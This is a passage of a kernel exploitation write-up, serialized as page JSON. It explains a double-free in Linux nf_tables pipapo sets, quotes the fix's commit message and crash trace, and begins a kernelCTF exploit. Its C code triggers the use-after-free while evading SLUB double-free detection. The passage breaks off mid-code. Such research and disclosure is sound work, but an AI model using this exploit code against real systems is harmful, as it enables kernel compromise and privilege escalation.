#155\n",{"type":28,"tag":116,"props":53501,"children":53502},{"class":245,"line":631},[53503],{"type":28,"tag":116,"props":53504,"children":53505},{},[53506],{"type":33,"value":9986},{"type":28,"tag":116,"props":53508,"children":53509},{"class":245,"line":665},[53510],{"type":28,"tag":116,"props":53511,"children":53512},{},[53513],{"type":33,"value":53514},"[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":28,"tag":116,"props":53516,"children":53517},{"class":245,"line":713},[53518],{"type":28,"tag":116,"props":53519,"children":53520},{},[53521],{"type":33,"value":53522},"[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n",{"type":28,"tag":116,"props":53524,"children":53525},{"class":245,"line":750},[53526],{"type":28,"tag":116,"props":53527,"children":53528},{},[53529],{"type":33,"value":9986},{"type":28,"tag":116,"props":53531,"children":53532},{"class":245,"line":779},[53533],{"type":28,"tag":116,"props":53534,"children":53535},{},[53536],{"type":33,"value":53537},"[16302.231917] Call Trace:\n",{"type":28,"tag":116,"props":53539,"children":53540},{"class":245,"line":796},[53541],{"type":28,"tag":116,"props":53542,"children":53543},{},[53544],{"type":33,"value":53545},"[16302.231919]  \u003CTASK>\n",{"type":28,"tag":116,"props":53547,"children":53548},{"class":245,"line":847},[53549],{"type":28,"tag":116,"props":53550,"children":53551},{},[53552],{"type":33,"value":53553},"[16302.231921]  __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n",{"type":28,"tag":116,"props":53555,"children":53556},{"class":245,"line":898},[53557],{"type":28,"tag":116,"props":53558,"children":53559},{},[53560],{"type":33,"value":53561},"[16302.231934]  nf_tables_abort+0x30/0x50 [nf_tables]\n",{"type":28,"tag":116,"props":53563,"children":53564},{"class":245,"line":907},[53565],{"type":28,"tag":116,"props":53566,"children":53567},{},[53568],{"type":33,"value":53569},"[16302.231946]  nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n",{"type":28,"tag":116,"props":53571,"children":53572},{"class":245,"line":981},[53573],{"type":28,"tag":116,"props":53574,"children":53575},{},[53576],{"type":33,"value":53577},"[16302.231952]  ? __nla_validate_parse+0x48/0x190\n",{"type":28,"tag":116,"props":53579,"children":53580},{"class":245,"line":1011},[53581],{"type":28,"tag":116,"props":53582,"children":53583},{},[53584],{"type":33,"value":53585},"[16302.231959]  nfnetlink_rcv+0x110/0x129 [nfnetlink]\n",{"type":28,"tag":116,"props":53587,"children":53588},{"class":245,"line":1029},[53589],{"type":28,"tag":116,"props":53590,"children":53591},{},[53592],{"type":33,"value":53593},"[16302.231963]  netlink_unicast+0x211/0x340\n",{"type":28,"tag":116,"props":53595,"children":53596},{"class":245,"line":1038},[53597],{"type":28,"tag":116,"props":53598,"children":53599},{},[53600],{"type":33,"value":53601},"[16302.231969]  netlink_sendmsg+0x21e/0x460\n",{"type":28,"tag":116,"props":53603,"children":53604},{"class":245,"line":1047},[53605],{"type":28,"tag":116,"props":53606,"children":53607},{"emptyLinePlaceholder":19},[53608],{"type":33,"value":1044},{"type":28,"tag":116,"props":53610,"children":53611},{"class":245,"line":1071},[53612],{"type":28,"tag":116,"props":53613,"children":53614},{},[53615],{"type":33,"value":53616},"Add nft_set_pipapo_match_destroy() helper function to release the\n",{"type":28,"tag":116,"props":53618,"children":53619},{"class":245,"line":1137},[53620],{"type":28,"tag":116,"props":53621,"children":53622},{},[53623],{"type":33,"value":53624},"elements in the lookup tables.\n",{"type":28,"tag":116,"props":53626,"children":53627},{"class":245,"line":1181},[53628],{"type":28,"tag":116,"props":53629,"children":53630},{"emptyLinePlaceholder":19},[53631],{"type":33,"value":1044},{"type":28,"tag":116,"props":53633,"children":53634},{"class":245,"line":1212},[53635],{"type":28,"tag":116,"props":53636,"children":53637},{},[53638],{"type":33,"value":53639},"Stefano Brivio says: \"We additionally look for elements pointers in the\n",{"type":28,"tag":116,"props":53641,"children":53642},{"class":245,"line":1254},[53643],{"type":28,"tag":116,"props":53644,"children":53645},{},[53646],{"type":33,"value":53647},"cloned matching data if priv->dirty is set, because that means that\n",{"type":28,"tag":116,"props":53649,"children":53650},{"class":245,"line":1262},[53651],{"type":28,"tag":116,"props":53652,"children":53653},{},[53654],{"type":33,"value":53655},"cloned data might point to additional elements we did not commit to the\n",{"type":28,"tag":116,"props":53657,"children":53658},{"class":245,"line":1294},[53659],{"type":28,"tag":116,"props":53660,"children":53661},{},[53662],{"type":33,"value":53663},"working copy yet (such as the abort path case, but perhaps not limited\n",{"type":28,"tag":116,"props":53665,"children":53666},{"class":245,"line":1334},[53667],{"type":28,"tag":116,"props":53668,"children":53669},{},[53670],{"type":33,"value":53671},"to it).\"\n",{"type":28,"tag":116,"props":53673,"children":53674},{"class":245,"line":1372},[53675],{"type":28,"tag":116,"props":53676,"children":53677},{"emptyLinePlaceholder":19},[53678],{"type":33,"value":1044},{"type":28,"tag":116,"props":53680,"children":53681},{"class":245,"line":1381},[53682],{"type":28,"tag":116,"props":53683,"children":53684},{},[53685],{"type":33,"value":53686},"Fixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\n",{"type":28,"tag":116,"props":53688,"children":53689},{"class":245,"line":1389},[53690],{"type":28,"tag":116,"props":53691,"children":53692},{},[53693],{"type":33,"value":53694},"Reviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\n",{"type":28,"tag":116,"props":53696,"children":53697},{"class":245,"line":1425},[53698],{"type":28,"tag":116,"props":53699,"children":53700},{},[53701],{"type":33,"value":53702},"Signed-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n",{"type":28,"tag":29,"props":53704,"children":53705},{},[53706,53708,53713,53715,53720,53722,53727,53729,53734],{"type":33,"value":53707},"As we previously discussed, committing changes to a pipapo ",{"type":28,"tag":98,"props":53709,"children":53711},{"className":53710},[],[53712],{"type":33,"value":50639},{"type":33,"value":53714}," is implemented by creating a clone of the match object, to which changes are made during the control plane. Later, if we enter the commit path, the changes are committed in the ",{"type":28,"tag":98,"props":53716,"children":53718},{"className":53717},[],[53719],{"type":33,"value":51963},{"type":33,"value":53721}," method by simply replacing the ",{"type":28,"tag":98,"props":53723,"children":53725},{"className":53724},[],[53726],{"type":33,"value":50639},{"type":33,"value":53728},"s match object with its updated clone. So checking the ",{"type":28,"tag":98,"props":53730,"children":53732},{"className":53731},[],[53733],{"type":33,"value":50593},{"type":33,"value":53735}," flag and then calling free again ensures we also free uncommitted changes.",{"type":28,"tag":29,"props":53737,"children":53738},{},[53739,53741,53746],{"type":33,"value":53740},"This doesn't make sense in the commit path but only in the abort path. Evidently, when aborting the transaction that creates the ",{"type":28,"tag":98,"props":53742,"children":53744},{"className":53743},[],[53745],{"type":33,"value":50639},{"type":33,"value":53747},", there will be no committed changes, and there will only be the elements inside the clone, which will end up never being committed. So, to make sure we free these uncommitted elements, it's crucial to free what's in the clone.",{"type":28,"tag":29,"props":53749,"children":53750},{},[53751,53753,53759,53761,53766,53768,53773],{"type":33,"value":53752},"When this code was introduced, it was only reachable from the abort path because it was the only path where ",{"type":28,"tag":98,"props":53754,"children":53756},{"className":53755},[],[53757],{"type":33,"value":53758},"set->ops->destroy()",{"type":33,"value":53760}," could be called without clearing the ",{"type":28,"tag":98,"props":53762,"children":53764},{"className":53763},[],[53765],{"type":33,"value":50593},{"type":33,"value":53767}," flag, which was fine considering you didn't have duplicated views of the ",{"type":28,"tag":98,"props":53769,"children":53771},{"className":53770},[],[53772],{"type":33,"value":50631},{"type":33,"value":53774},"s, so they would all be in the clone set.",{"type":28,"tag":29,"props":53776,"children":53777},{},[53778,53780,53785],{"type":33,"value":53779},"But when the ",{"type":28,"tag":98,"props":53781,"children":53783},{"className":53782},[],[53784],{"type":33,"value":53347},{"type":33,"value":53786}," flag was introduced, some assumptions about the commit path were changed. It created a new way of reaching this code while having already committed changes in the set. This means any already committed changes will have a view in the \"normal\" match object and one in the clone.",{"type":28,"tag":29,"props":53788,"children":53789},{},[53790],{"type":33,"value":53791},"The vulnerability was fixed by only deleting elements from the clone because the clone should have all views of committed and uncommitted changes, effectively eliminating the double-free vulnerability.",{"type":28,"tag":63,"props":53793,"children":53795},{"id":53794},"kernelctf-exploit",[53796],{"type":33,"value":53797},"KernelCTF exploit",{"type":28,"tag":29,"props":53799,"children":53800},{},[53801,53803,53809,53811,53818],{"type":33,"value":53802},"Now that we know the full story of the bug, let's look into how I exploited it in the KernelCTF LTS instance before getting into the universal exploit. A great deal of the exploit is based on the ",{"type":28,"tag":98,"props":53804,"children":53806},{"className":53805},[],[53807],{"type":33,"value":53808},"nft_object + udata",{"type":33,"value":53810}," technique shared by lonial con in a ",{"type":28,"tag":87,"props":53812,"children":53815},{"href":53813,"rel":53814},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/docs/exploit.md",[91],[53816],{"type":33,"value":53817},"previous kernelCTF exploit",{"type":33,"value":141},{"type":28,"tag":75,"props":53820,"children":53822},{"id":53821},"trigger-uafavoid-double-free-detection",[53823],{"type":33,"value":53824},"Trigger UAF/avoid double-free detection",{"type":28,"tag":29,"props":53826,"children":53827},{},[53828,53830,53836,53838,53844],{"type":33,"value":53829},"The SLUB allocator has a naive double-free detection mechanism to spot straightforward sequences, such as the same object being added to the free-list twice in a row without any other objects being added in between.\nAs we have seen, ",{"type":28,"tag":98,"props":53831,"children":53833},{"className":53832},[],[53834],{"type":33,"value":53835},"nft_set_pipapo_match_destroy",{"type":33,"value":53837}," iterates over the ",{"type":28,"tag":98,"props":53839,"children":53841},{"className":53840},[],[53842],{"type":33,"value":53843},"setelems",{"type":33,"value":53845}," in the set and frees each of them, so it should be relatively simple to avoid detection by having more than one element in the set, in which case the following will happen:",{"type":28,"tag":455,"props":53847,"children":53848},{},[53849,53854,53859,53864],{"type":28,"tag":459,"props":53850,"children":53851},{},[53852],{"type":33,"value":53853},"Element A gets freed",{"type":28,"tag":459,"props":53855,"children":53856},{},[53857],{"type":33,"value":53858},"Element B gets free",{"type":28,"tag":459,"props":53860,"children":53861},{},[53862],{"type":33,"value":53863},"Element A gets freed again (double-free)",{"type":28,"tag":459,"props":53865,"children":53866},{},[53867],{"type":33,"value":53868},"Element B gets freed again (double-free)",{"type":28,"tag":234,"props":53870,"children":53872},{"className":28765,"code":53871,"language":28767,"meta":7,"style":7},"[...]\nstatic void trigger_uaf(struct mnl_socket *nl, size_t size, int *msgqids)\n{\n[...]\n    // TRANSACTION 2\n[...]\n\n    // create pipapo set\n    uint8_t desc[2] = {16, 16};\n    set = create_set(\n        batch, seq++, exploit_table_name, \"pwn_set\", 0x1337,\n        NFT_SET_INTERVAL | NFT_SET_OBJECT | NFT_SET_CONCAT, KEY_LEN, 2, &desc, NULL, 0, NFT_OBJECT_CT_EXPECT);\n\n    // commit 2 elems to set (elems A and B that will be double-freed)\n    for (int i = 0; i \u003C 2; i++)\n    {\n        elem[i] = nftnl_set_elem_alloc();\n        memset(key, 0x41 + i, KEY_LEN);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n        nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_USERDATA, &udata_buf, size);\n        nftnl_set_elem_add(set, elem[i]);\n    }\n[...]\n\n    // TRANSACTION 3\n[...]\n    set = nftnl_set_alloc();\n    nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);\n    nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);\n    nftnl_set_set_str(set, NFTNL_SET_NAME, \"pwn_set\");\n\n    // make priv->dirty true\n    memset(key, 0xff, KEY_LEN);\n    elem[3] = nftnl_set_elem_alloc();\n    nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n    nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n    nftnl_set_elem_add(set, elem[3]);\n[...]\n\n    // double-free commited elems\n[...]\n    nftnl_set_free(set);\n}\n[...]\n",[53873],{"type":28,"tag":98,"props":53874,"children":53875},{"__ignoreMap":7},[53876,53883,53944,53951,53958,53966,53973,53980,53988,54012,54033,54067,54128,54135,54143,54195,54202,54228,54255,54294,54323,54352,54374,54381,54388,54395,54403,54410,54418,54431,54444,54464,54471,54479,54501,54533,54578,54614,54642,54649,54656,54664,54671,54687,54694],{"type":28,"tag":116,"props":53877,"children":53878},{"class":245,"line":246},[53879],{"type":28,"tag":116,"props":53880,"children":53881},{"style":266},[53882],{"type":33,"value":9986},{"type":28,"tag":116,"props":53884,"children":53885},{"class":245,"line":256},[53886,53891,53895,53900,53904,53909,53913,53918,53923,53927,53931,53935,53940],{"type":28,"tag":116,"props":53887,"children":53888},{"style":266},[53889],{"type":33,"value":53890},"static void trigger_uaf(",{"type":28,"tag":116,"props":53892,"children":53893},{"style":376},[53894],{"type":33,"value":9069},{"type":28,"tag":116,"props":53896,"children":53897},{"style":339},[53898],{"type":33,"value":53899}," mnl_socket",{"type":28,"tag":116,"props":53901,"children":53902},{"style":376},[53903],{"type":33,"value":9484},{"type":28,"tag":116,"props":53905,"children":53906},{"style":272},[53907],{"type":33,"value":53908},"nl",{"type":28,"tag":116,"props":53910,"children":53911},{"style":266},[53912],{"type":33,"value":825},{"type":28,"tag":116,"props":53914,"children":53915},{"style":376},[53916],{"type":33,"value":53917},"size_t",{"type":28,"tag":116,"props":53919,"children":53920},{"style":272},[53921],{"type":33,"value":53922}," size",{"type":28,"tag":116,"props":53924,"children":53925},{"style":266},[53926],{"type":33,"value":825},{"type":28,"tag":116,"props":53928,"children":53929},{"style":376},[53930],{"type":33,"value":18710},{"type":28,"tag":116,"props":53932,"children":53933},{"style":376},[53934],{"type":33,"value":9484},{"type":28,"tag":116,"props":53936,"children":53937},{"style":272},[53938],{"type":33,"value":53939},"msgqids",{"type":28,"tag":116,"props":53941,"children":53942},{"style":266},[53943],{"type":33,"value":2830},{"type":28,"tag":116,"props":53945,"children":53946},{"class":245,"line":293},[53947],{"type":28,"tag":116,"props":53948,"children":53949},{"style":266},[53950],{"type":33,"value":10547},{"type":28,"tag":116,"props":53952,"children":53953},{"class":245,"line":361},[53954],{"type":28,"tag":116,"props":53955,"children":53956},{"style":266},[53957],{"type":33,"value":9986},{"type":28,"tag":116,"props":53959,"children":53960},{"class":245,"line":387},[53961],{"type":28,"tag":116,"props":53962,"children":53963},{"style":266},[53964],{"type":33,"value":53965},"    // TRANSACTION 2\n",{"type":28,"tag":116,"props":53967,"children":53968},{"class":245,"line":400},[53969],{"type":28,"tag":116,"props":53970,"children":53971},{"style":266},[53972],{"type":33,"value":9986},{"type":28,"tag":116,"props":53974,"children":53975},{"class":245,"line":614},[53976],{"type":28,"tag":116,"props":53977,"children":53978},{"emptyLinePlaceholder":19},[53979],{"type":33,"value":1044},{"type":28,"tag":116,"props":53981,"children":53982},{"class":245,"line":631},[53983],{"type":28,"tag":116,"props":53984,"children":53985},{"style":266},[53986],{"type":33,"value":53987},"    // create pipapo set\n",{"type":28,"tag":116,"props":53989,"children":53990},{"class":245,"line":665},[53991,53996,54000,54004,54008],{"type":28,"tag":116,"props":53992,"children":53993},{"style":266},[53994],{"type":33,"value":53995},"    uint8_t desc[2] = {",{"type":28,"tag":116,"props":53997,"children":53998},{"style":350},[53999],{"type":33,"value":40467},{"type":28,"tag":116,"props":54001,"children":54002},{"style":266},[54003],{"type":33,"value":825},{"type":28,"tag":116,"props":54005,"children":54006},{"style":350},[54007],{"type":33,"value":40467},{"type":28,"tag":116,"props":54009,"children":54010},{"style":266},[54011],{"type":33,"value":16239},{"type":28,"tag":116,"props":54013,"children":54014},{"class":245,"line":713},[54015,54020,54024,54029],{"type":28,"tag":116,"props":54016,"children":54017},{"style":266},[54018],{"type":33,"value":54019},"    set ",{"type":28,"tag":116,"props":54021,"children":54022},{"style":370},[54023],{"type":33,"value":373},{"type":28,"tag":116,"props":54025,"children":54026},{"style":282},[54027],{"type":33,"value":54028}," create_set",{"type":28,"tag":116,"props":54030,"children":54031},{"style":266},[54032],{"type":33,"value":3133},{"type":28,"tag":116,"props":54034,"children":54035},{"class":245,"line":750},[54036,54041,54045,54050,54055,54059,54063],{"type":28,"tag":116,"props":54037,"children":54038},{"style":266},[54039],{"type":33,"value":54040},"        batch, seq",{"type":28,"tag":116,"props":54042,"children":54043},{"style":370},[54044],{"type":33,"value":50888},{"type":28,"tag":116,"props":54046,"children":54047},{"style":266},[54048],{"type":33,"value":54049},", exploit_table_name, ",{"type":28,"tag":116,"props":54051,"children":54052},{"style":563},[54053],{"type":33,"value":54054},"\"pwn_set\"",{"type":28,"tag":116,"props":54056,"children":54057},{"style":266},[54058],{"type":33,"value":825},{"type":28,"tag":116,"props":54060,"children":54061},{"style":350},[54062],{"type":33,"value":43124},{"type":28,"tag":116,"props":54064,"children":54065},{"style":266},[54066],{"type":33,"value":3178},{"type":28,"tag":116,"props":54068,"children":54069},{"class":245,"line":779},[54070,54075,54079,54084,54088,54093,54097,54101,54105,54110,54115,54119,54123],{"type":28,"tag":116,"props":54071,"children":54072},{"style":266},[54073],{"type":33,"value":54074},"        NFT_SET_INTERVAL ",{"type":28,"tag":116,"props":54076,"children":54077},{"style":370},[54078],{"type":33,"value":10083},{"type":28,"tag":116,"props":54080,"children":54081},{"style":266},[54082],{"type":33,"value":54083}," NFT_SET_OBJECT ",{"type":28,"tag":116,"props":54085,"children":54086},{"style":370},[54087],{"type":33,"value":10083},{"type":28,"tag":116,"props":54089,"children":54090},{"style":266},[54091],{"type":33,"value":54092}," NFT_SET_CONCAT, KEY_LEN, ",{"type":28,"tag":116,"props":54094,"children":54095},{"style":350},[54096],{"type":33,"value":2794},{"type":28,"tag":116,"props":54098,"children":54099},{"style":266},[54100],{"type":33,"value":825},{"type":28,"tag":116,"props":54102,"children":54103},{"style":370},[54104],{"type":33,"value":2780},{"type":28,"tag":116,"props":54106,"children":54107},{"style":266},[54108],{"type":33,"value":54109},"desc, ",{"type":28,"tag":116,"props":54111,"children":54112},{"style":376},[54113],{"type":33,"value":54114},"NULL",{"type":28,"tag":116,"props":54116,"children":54117},{"style":266},[54118],{"type":33,"value":825},{"type":28,"tag":116,"props":54120,"children":54121},{"style":350},[54122],{"type":33,"value":353},{"type":28,"tag":116,"props":54124,"children":54125},{"style":266},[54126],{"type":33,"value":54127},", NFT_OBJECT_CT_EXPECT);\n",{"type":28,"tag":116,"props":54129,"children":54130},{"class":245,"line":796},[54131],{"type":28,"tag":116,"props":54132,"children":54133},{"emptyLinePlaceholder":19},[54134],{"type":33,"value":1044},{"type":28,"tag":116,"props":54136,"children":54137},{"class":245,"line":847},[54138],{"type":28,"tag":116,"props":54139,"children":54140},{"style":250},[54141],{"type":33,"value":54142},"    // commit 2 elems to set (elems A and B that will be double-freed)\n",{"type":28,"tag":116,"props":54144,"children":54145},{"class":245,"line":898},[54146,54150,54154,54158,54163,54167,54171,54175,54179,54183,54187,54191],{"type":28,"tag":116,"props":54147,"children":54148},{"style":260},[54149],{"type":33,"value":2703},{"type":28,"tag":116,"props":54151,"children":54152},{"style":266},[54153],{"type":33,"value":269},{"type":28,"tag":116,"props":54155,"children":54156},{"style":376},[54157],{"type":33,"value":18710},{"type":28,"tag":116,"props":54159,"children":54160},{"style":266},[54161],{"type":33,"value":54162}," i ",{"type":28,"tag":116,"props":54164,"children":54165},{"style":370},[54166],{"type":33,"value":373},{"type":28,"tag":116,"props":54168,"children":54169},{"style":350},[54170],{"type":33,"value":2718},{"type":28,"tag":116,"props":54172,"children":54173},{"style":266},[54174],{"type":33,"value":50852},{"type":28,"tag":116,"props":54176,"children":54177},{"style":370},[54178],{"type":33,"value":514},{"type":28,"tag":116,"props":54180,"children":54181},{"style":350},[54182],{"type":33,"value":7606},{"type":28,"tag":116,"props":54184,"children":54185},{"style":266},[54186],{"type":33,"value":50883},{"type":28,"tag":116,"props":54188,"children":54189},{"style":370},[54190],{"type":33,"value":50888},{"type":28,"tag":116,"props":54192,"children":54193},{"style":266},[54194],{"type":33,"value":2830},{"type":28,"tag":116,"props":54196,"children":54197},{"class":245,"line":907},[54198],{"type":28,"tag":116,"props":54199,"children":54200},{"style":266},[54201],{"type":33,"value":28842},{"type":28,"tag":116,"props":54203,"children":54204},{"class":245,"line":981},[54205,54210,54215,54219,54224],{"type":28,"tag":116,"props":54206,"children":54207},{"style":272},[54208],{"type":33,"value":54209},"        elem",{"type":28,"tag":116,"props":54211,"children":54212},{"style":266},[54213],{"type":33,"value":54214},"[i] ",{"type":28,"tag":116,"props":54216,"children":54217},{"style":370},[54218],{"type":33,"value":373},{"type":28,"tag":116,"props":54220,"children":54221},{"style":282},[54222],{"type":33,"value":54223}," nftnl_set_elem_alloc",{"type":28,"tag":116,"props":54225,"children":54226},{"style":266},[54227],{"type":33,"value":1445},{"type":28,"tag":116,"props":54229,"children":54230},{"class":245,"line":1011},[54231,54236,54241,54246,54250],{"type":28,"tag":116,"props":54232,"children":54233},{"style":282},[54234],{"type":33,"value":54235},"        memset",{"type":28,"tag":116,"props":54237,"children":54238},{"style":266},[54239],{"type":33,"value":54240},"(key, ",{"type":28,"tag":116,"props":54242,"children":54243},{"style":350},[54244],{"type":33,"value":54245},"0x41",{"type":28,"tag":116,"props":54247,"children":54248},{"style":370},[54249],{"type":33,"value":2258},{"type":28,"tag":116,"props":54251,"children":54252},{"style":266},[54253],{"type":33,"value":54254}," i, KEY_LEN);\n",{"type":28,"tag":116,"props":54256,"children":54257},{"class":245,"line":1029},[54258,54263,54267,54271,54276,54281,54285,54290],{"type":28,"tag":116,"props":54259,"children":54260},{"style":282},[54261],{"type":33,"value":54262},"        nftnl_set_elem_set",{"type":28,"tag":116,"props":54264,"children":54265},{"style":266},[54266],{"type":33,"value":313},{"type":28,"tag":116,"props":54268,"children":54269},{"style":272},[54270],{"type":33,"value":51682},{"type":28,"tag":116,"props":54272,"children":54273},{"style":266},[54274],{"type":33,"value":54275},"[i], NFTNL_SET_ELEM_OBJREF, ",{"type":28,"tag":116,"props":54277,"children":54278},{"style":563},[54279],{"type":33,"value":54280},"\"pwnobj\"",{"type":28,"tag":116,"props":54282,"children":54283},{"style":266},[54284],{"type":33,"value":825},{"type":28,"tag":116,"props":54286,"children":54287},{"style":350},[54288],{"type":33,"value":54289},"7",{"type":28,"tag":116,"props":54291,"children":54292},{"style":266},[54293],{"type":33,"value":895},{"type":28,"tag":116,"props":54295,"children":54296},{"class":245,"line":1038},[54297,54301,54305,54309,54314,54318],{"type":28,"tag":116,"props":54298,"children":54299},{"style":282},[54300],{"type":33,"value":54262},{"type":28,"tag":116,"props":54302,"children":54303},{"style":266},[54304],{"type":33,"value":313},{"type":28,"tag":116,"props":54306,"children":54307},{"style":272},[54308],{"type":33,"value":51682},{"type":28,"tag":116,"props":54310,"children":54311},{"style":266},[54312],{"type":33,"value":54313},"[i], NFTNL_SET_ELEM_KEY, ",{"type":28,"tag":116,"props":54315,"children":54316},{"style":370},[54317],{"type":33,"value":2780},{"type":28,"tag":116,"props":54319,"children":54320},{"style":266},[54321],{"type":33,"value":54322},"key, KEY_LEN);\n",{"type":28,"tag":116,"props":54324,"children":54325},{"class":245,"line":1047},[54326,54330,54334,54338,54343,54347],{"type":28,"tag":116,"props":54327,"children":54328},{"style":282},[54329],{"type":33,"value":54262},{"type":28,"tag":116,"props":54331,"children":54332},{"style":266},[54333],{"type":33,"value":313},{"type":28,"tag":116,"props":54335,"children":54336},{"style":272},[54337],{"type":33,"value":51682},{"type":28,"tag":116,"props":54339,"children":54340},{"style":266},[54341],{"type":33,"value":54342},"[i], NFTNL_SET_ELEM_USERDATA, ",{"type":28,"tag":116,"props":54344,"children":54345},{"style":370},[54346],{"type":33,"value":2780},{"type":28,"tag":116,"props":54348,"children":54349},{"style":266},[54350],{"type":33,"value":54351},"udata_buf, size);\n",{"type":28,"tag":116,"props":54353,"children":54354},{"class":245,"line":1071},[54355,54360,54365,54369],{"type":28,"tag":116,"props":54356,"children":54357},{"style":282},[54358],{"type":33,"value":54359},"        nftnl_set_elem_add",{"type":28,"tag":116,"props":54361,"children":54362},{"style":266},[54363],{"type":33,"value":54364},"(set, ",{"type":28,"tag":116,"props":54366,"children":54367},{"style":272},[54368],{"type":33,"value":51682},{"type":28,"tag":116,"props":54370,"children":54371},{"style":266},[54372],{"type":33,"value":54373},"[i]);\n",{"type":28,"tag":116,"props":54375,"children":54376},{"class":245,"line":1137},[54377],{"type":28,"tag":116,"props":54378,"children":54379},{"style":266},[54380],{"type":33,"value":3025},{"type":28,"tag":116,"props":54382,"children":54383},{"class":245,"line":1181},[54384],{"type":28,"tag":116,"props":54385,"children":54386},{"style":266},[54387],{"type":33,"value":9986},{"type":28,"tag":116,"props":54389,"children":54390},{"class":245,"line":1212},[54391],{"type":28,"tag":116,"props":54392,"children":54393},{"emptyLinePlaceholder":19},[54394],{"type":33,"value":1044},{"type":28,"tag":116,"props":54396,"children":54397},{"class":245,"line":1254},[54398],{"type":28,"tag":116,"props":54399,"children":54400},{"style":266},[54401],{"type":33,"value":54402},"    // TRANSACTION 3\n",{"type":28,"tag":116,"props":54404,"children":54405},{"class":245,"line":1262},[54406],{"type":28,"tag":116,"props":54407,"children":54408},{"style":266},[54409],{"type":33,"value":9986},{"type":28,"tag":116,"props":54411,"children":54412},{"class":245,"line":1294},[54413],{"type":28,"tag":116,"props":54414,"children":54415},{"style":266},[54416],{"type":33,"value":54417},"    set = nftnl_set_alloc();\n",{"type":28,"tag":116,"props":54419,"children":54420},{"class":245,"line":1334},[54421,54426],{"type":28,"tag":116,"props":54422,"children":54423},{"style":282},[54424],{"type":33,"value":54425},"    nftnl_set_set_u32",{"type":28,"tag":116,"props":54427,"children":54428},{"style":266},[54429],{"type":33,"value":54430},"(set, NFTNL_SET_FAMILY, family);\n",{"type":28,"tag":116,"props":54432,"children":54433},{"class":245,"line":1372},[54434,54439],{"type":28,"tag":116,"props":54435,"children":54436},{"style":282},[54437],{"type":33,"value":54438},"    nftnl_set_set_str",{"type":28,"tag":116,"props":54440,"children":54441},{"style":266},[54442],{"type":33,"value":54443},"(set, NFTNL_SET_TABLE, exploit_table_name);\n",{"type":28,"tag":116,"props":54445,"children":54446},{"class":245,"line":1381},[54447,54451,54456,54460],{"type":28,"tag":116,"props":54448,"children":54449},{"style":282},[54450],{"type":33,"value":54438},{"type":28,"tag":116,"props":54452,"children":54453},{"style":266},[54454],{"type":33,"value":54455},"(set, NFTNL_SET_NAME, ",{"type":28,"tag":116,"props":54457,"children":54458},{"style":563},[54459],{"type":33,"value":54054},{"type":28,"tag":116,"props":54461,"children":54462},{"style":266},[54463],{"type":33,"value":895},{"type":28,"tag":116,"props":54465,"children":54466},{"class":245,"line":1389},[54467],{"type":28,"tag":116,"props":54468,"children":54469},{"emptyLinePlaceholder":19},[54470],{"type":33,"value":1044},{"type":28,"tag":116,"props":54472,"children":54473},{"class":245,"line":1425},[54474],{"type":28,"tag":116,"props":54475,"children":54476},{"style":250},[54477],{"type":33,"value":54478},"    // make priv->dirty true\n",{"type":28,"tag":116,"props":54480,"children":54481},{"class":245,"line":1448},[54482,54487,54491,54496],{"type":28,"tag":116,"props":54483,"children":54484},{"style":282},[54485],{"type":33,"value":54486},"    memset",{"type":28,"tag":116,"props":54488,"children":54489},{"style":266},[54490],{"type":33,"value":54240},{"type":28,"tag":116,"props":54492,"children":54493},{"style":350},[54494],{"type":33,"value":54495},"0xff",{"type":28,"tag":116,"props":54497,"children":54498},{"style":266},[54499],{"type":33,"value":54500},", KEY_LEN);\n",{"type":28,"tag":116,"props":54502,"children":54503},{"class":245,"line":1456},[54504,54509,54513,54517,54521,54525,54529],{"type":28,"tag":116,"props":54505,"children":54506},{"style":272},[54507],{"type":33,"value":54508},"    elem",{"type":28,"tag":116,"props":54510,"children":54511},{"style":266},[54512],{"type":33,"value":347},{"type":28,"tag":116,"props":54514,"children":54515},{"style":350},[54516],{"type":33,"value":16957},{"type":28,"tag":116,"props":54518,"children":54519},{"style":266},[54520],{"type":33,"value":8333},{"type":28,"tag":116,"props":54522,"children":54523},{"style":370},[54524],{"type":33,"value":373},{"type":28,"tag":116,"props":54526,"children":54527},{"style":282},[54528],{"type":33,"value":54223},{"type":28,"tag":116,"props":54530,"children":54531},{"style":266},[54532],{"type":33,"value":1445},{"type":28,"tag":116,"props":54534,"children":54535},{"class":245,"line":1520},[54536,54541,54545,54549,54553,54557,54562,54566,54570,54574],{"type":28,"tag":116,"props":54537,"children":54538},{"style":282},[54539],{"type":33,"value":54540},"    nftnl_set_elem_set",{"type":28,"tag":116,"props":54542,"children":54543},{"style":266},[54544],{"type":33,"value":313},{"type":28,"tag":116,"props":54546,"children":54547},{"style":272},[54548],{"type":33,"value":51682},{"type":28,"tag":116,"props":54550,"children":54551},{"style":266},[54552],{"type":33,"value":347},{"type":28,"tag":116,"props":54554,"children":54555},{"style":350},[54556],{"type":33,"value":16957},{"type":28,"tag":116,"props":54558,"children":54559},{"style":266},[54560],{"type":33,"value":54561},"], NFTNL_SET_ELEM_OBJREF, 